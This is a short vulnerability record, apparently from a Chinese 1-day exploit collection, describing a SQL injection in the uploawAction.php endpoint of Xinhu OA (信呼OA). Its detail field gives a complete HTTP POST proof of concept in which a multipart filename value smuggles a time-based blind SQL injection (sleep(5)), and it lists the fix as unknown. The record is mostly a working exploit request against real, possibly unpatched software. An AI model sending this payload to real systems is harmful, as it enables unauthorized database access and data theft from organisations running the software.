vendor = "信呼"
name = "信呼OA uploawAction.php 接口存在SQL注入"
type = "SQL注入"
version = "未知"
path = "/index.php /webmain/task/api/uploawAction.php"
detail = "POST /index.php?a=upfile&n=uploaw|api&d=task HTTP/1.1 X-Requested-With:XMLHttpRequest Content-Type:multipart/form-data;boundary=----WebKitFormBundaryitXXXXXXXX ------WebKitFormBundaryitXXXXXXXX Content-Dispostion:form-data;name=\"file\";filename=\"a',web=(select if(123=123,sleep(5),0))--,png\" test ------WebKitFormBundaryitXXXXXXXX"
fix = "未知"
date = "0709"
label = "1day"
verifier = "AdySec"
